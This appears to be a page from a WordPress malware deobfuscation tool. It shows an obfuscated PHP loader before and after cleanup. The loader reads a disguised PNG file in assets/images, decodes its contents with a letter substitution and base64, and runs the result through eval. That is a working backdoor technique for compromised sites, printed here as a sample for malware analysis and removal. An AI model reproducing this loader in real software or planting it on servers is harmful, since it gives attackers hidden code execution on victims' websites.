Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.01 | <?php |
02 |
03 | function surybu_beshaxyshav($vuneva_ehatahaw) { |
04 | $ajepiva = strtr($vuneva_ehatahaw, array('r'=>'Q', 'F'=>'W', 'Q'=>'E', 'T'=>'R', 'D'=>'T', 'U'=>'Y', 'S'=>'U', 'C'=>'I', 'R'=>'O', 'M'=>'P', |
05 | 'n'=>'A', 'Z'=>'S', 'G'=>'D', 'e'=>'F', 'K'=>'G', 'P'=>'H', 't'=>'J', 'y'=>'K', '8'=>'L', 'E'=>'Z', |
06 | 'O'=>'X', 'W'=>'C', '+'=>'V', 'B'=>'B', 'I'=>'N', 'a'=>'M', 'm'=>'q', 'A'=>'w', 'N'=>'e', 'i'=>'r', |
07 | 'H'=>'t', 'j'=>'y', 'h'=>'u', 'J'=>'i', '3'=>'o', '/'=>'p', 'q'=>'a', '0'=>'s', 'o'=>'d', '='=>'f', |
08 | 'w'=>'g', 'c'=>'h', '1'=>'j', 'V'=>'k', '7'=>'l', 'z'=>'z', 'u'=>'x', 'b'=>'c', 'd'=>'v', 'x'=>'b', |
09 | 'X'=>'n', '5'=>'m', '2'=>'1', 'g'=>'2', 'p'=>'3', '9'=>'4', 'Y'=>'5', 'k'=>'6', 'L'=>'7', 'f'=>'8', |
10 | 's'=>'9', '6'=>'0', 'v'=>'=', '4'=>'+', 'l'=>'/')); |
11 | $ajepiva = base64_decode($ajepiva); |
12 |
13 | return $ajepiva; |
14 | } |
15 |
16 | function ujoxuq_wifechaze($vuneva_ehatahaw) { |
17 | if (!file_exists($vuneva_ehatahaw)) |
18 | return false; |
19 | $baqoga = @file_get_contents($vuneva_ehatahaw); |
20 | if (!$baqoga) |
21 | return false; |
22 | $baqoga = substr($baqoga, 3); |
23 | $rivezyq = surybu_beshaxyshav($baqoga); |
24 | return $rivezyq; |
25 | } |
26 |
27 | $ujucac = __DIR__ . '/assets/images/wibubal.png'; |
28 |
29 | if (file_exists($ujucac)) { |
30 | $ashoceb = ujoxuq_wifechaze($ujucac); |
31 | if ($ashoceb) { |
32 | @eval($ashoceb); |
33 | } |
34 | } |
01 | <?php |
02 |
03 | function surybu_beshaxyshav($vuneva_ehatahaw) |
04 | { |
05 | $ajepiva = strtr($vuneva_ehatahaw, array('r' => 'Q', 'F' => 'W', 'Q' => 'E', 'T' => 'R', 'D' => 'T', 'U' => 'Y', 'S' => 'U', 'C' => 'I', 'R' => 'O', 'M' => 'P', 'n' => 'A', 'Z' => 'S', 'G' => 'D', 'e' => 'F', 'K' => 'G', 'P' => 'H', 't' => 'J', 'y' => 'K', '8' => 'L', 'E' => 'Z', 'O' => 'X', 'W' => 'C', '+' => 'V', 'B' => 'B', 'I' => 'N', 'a' => 'M', 'm' => 'q', 'A' => 'w', 'N' => 'e', 'i' => 'r', 'H' => 't', 'j' => 'y', 'h' => 'u', 'J' => 'i', '3' => 'o', '/' => 'p', 'q' => 'a', '0' => 's', 'o' => 'd', '=' => 'f', 'w' => 'g', 'c' => 'h', '1' => 'j', 'V' => 'k', '7' => 'l', 'z' => 'z', 'u' => 'x', 'b' => 'c', 'd' => 'v', 'x' => 'b', 'X' => 'n', '5' => 'm', '2' => '1', 'g' => '2', 'p' => '3', '9' => '4', 'Y' => '5', 'k' => '6', 'L' => '7', 'f' => '8', 's' => '9', '6' => '0', 'v' => '=', '4' => '+', 'l' => '/')); |
06 | $ajepiva = base64_decode($ajepiva); |
07 | return $ajepiva; |
08 | } |
09 | function ujoxuq_wifechaze($vuneva_ehatahaw) |
10 | { |
11 | if (!file_exists($vuneva_ehatahaw)) { |
12 | return false; |
13 | } |
14 | $baqoga = @file_get_contents($vuneva_ehatahaw); |
15 | if (!$baqoga) { |
16 | return false; |
17 | } |
18 | $baqoga = substr($baqoga, 3); |
19 | $rivezyq = surybu_beshaxyshav($baqoga); |
20 | return $rivezyq; |
21 | } |
22 | $ujucac = "/var/www/html/assets/images/wibubal.png"; |
23 | if (file_exists($ujucac)) { |
24 | $ashoceb = ujoxuq_wifechaze($ujucac); |
25 | if ($ashoceb) { |
26 | @eval($ashoceb); |
27 | } |
28 | } |
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.